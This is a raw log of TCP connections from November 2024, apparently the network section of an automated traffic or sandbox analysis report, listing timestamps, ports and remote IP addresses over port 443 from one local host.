                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293308973 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293320894 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.986263990 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.986313105 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.986433983 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.987087011 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.987104893 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437402964 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437465906 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437475920 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437484980 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437561989 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.437561989 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.520553112 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.520649910 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.709640026 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.709678888 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.710869074 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.710879087 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.731292009 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:28.731326103 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863445997 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863567114 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863584042 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863630056 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863630056 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.863693953 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.880291939 CET49743443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:29.880319118 CET4434974349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.041691065 CET49704443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.041923046 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.041951895 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.042098045 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.043329000 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.043342113 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.161524057 CET4434970440.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.163373947 CET49704443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.676743031 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.676795006 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.676923990 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.677822113 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.677855015 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.678252935 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.678253889 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.678268909 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.682051897 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.682082891 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.939980984 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.940087080 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.975631952 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.975649118 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.975961924 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.977530956 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.977607965 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:32.977629900 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.335983038 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.336035967 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.336102962 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.338294983 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.338308096 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.485400915 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.487756968 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.487771034 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.488948107 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.489029884 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.490226984 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.490299940 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.490349054 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.522289038 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.522741079 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.522758007 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.524272919 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.524348021 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.525904894 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.526087999 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.531337023 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.621587038 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.621598959 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.621635914 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.621649981 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715038061 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715070963 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715112925 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715157986 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715202093 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.715229034 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.718318939 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.718580961 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.720626116 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.720645905 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.720666885 CET49752443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.720674038 CET4434975240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.815145969 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.815160990 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.995851040 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.995965958 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.996072054 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.305490971 CET49754443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.305515051 CET4434975494.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.738739967 CET49762443192.168.2.82.16.158.185
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.738799095 CET443497622.16.158.185192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.738883972 CET49762443192.168.2.82.16.158.185
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.739171028 CET49762443192.168.2.82.16.158.185
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.739192963 CET443497622.16.158.185192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.788017988 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.788099051 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.816222906 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.816235065 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.818845034 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.818851948 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.818911076 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.818918943 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.999254942 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.999321938 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.999392986 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.000284910 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.000298977 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.798027992 CET49768443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.798074961 CET44349768162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.798257113 CET49768443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.798778057 CET49768443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.798789024 CET44349768162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.872895002 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873006105 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873131037 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873313904 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873347998 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873594999 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873625994 CET44349770162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873811007 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873843908 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873851061 CET44349770162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946217060 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946274042 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946296930 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946311951 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946331978 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.946361065 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.970155001 CET49757443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.970171928 CET4434975749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.064866066 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.064901114 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.064975977 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.065330029 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.065345049 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.080358982 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.080811977 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.080847025 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.080986977 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.081928015 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.081948042 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.082020044 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.082134008 CET4434975394.245.104.56192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.082207918 CET49753443192.168.2.894.245.104.56
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.082757950 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.083421946 CET49762443192.168.2.82.16.158.185
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.085249901 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.085294008 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.085340977 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.087666035 CET49768443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.088092089 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.088115931 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.088205099 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.090169907 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.090199947 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.090323925 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.090343952 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.127341986 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.127394915 CET44349770162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.131335974 CET443497622.16.158.185192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.135335922 CET44349768162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.177707911 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.177725077 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.177769899 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.177941084 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.177947998 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.308578968 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.308618069 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.308734894 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.308819056 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.308828115 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.377995968 CET443497622.16.158.185192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.378067970 CET49762443192.168.2.82.16.158.185
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.398129940 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.398336887 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.398772955 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.398787022 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401489019 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401498079 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401588917 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401602983 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401685953 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401700974 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401710987 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401717901 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401799917 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.401868105 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.515075922 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.515125990 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.515259981 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.515799999 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.515815020 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.528752089 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.528805017 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.528867006 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.529258013 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.529273987 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.568324089 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.568368912 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.568501949 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.568726063 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.568738937 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.091535091 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.091710091 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.091788054 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.091789007 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.106385946 CET44349768162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.106452942 CET49768443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.133353949 CET44349770162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.133716106 CET44349770162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.133779049 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.133779049 CET49770443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.350409985 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.350701094 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.350733042 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.351814985 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.351875067 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.354614973 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.354682922 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.354955912 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.354964972 CET44349784172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.389338970 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.401500940 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.428281069 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.428379059 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.428411961 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.428431034 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.429662943 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.429743052 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.431885958 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.431983948 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.460287094 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.460473061 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464565039 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464637041 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464714050 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.468101025 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.468117952 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.472434044 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.472810984 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.472847939 CET44349788162.159.61.3192.168.2.8
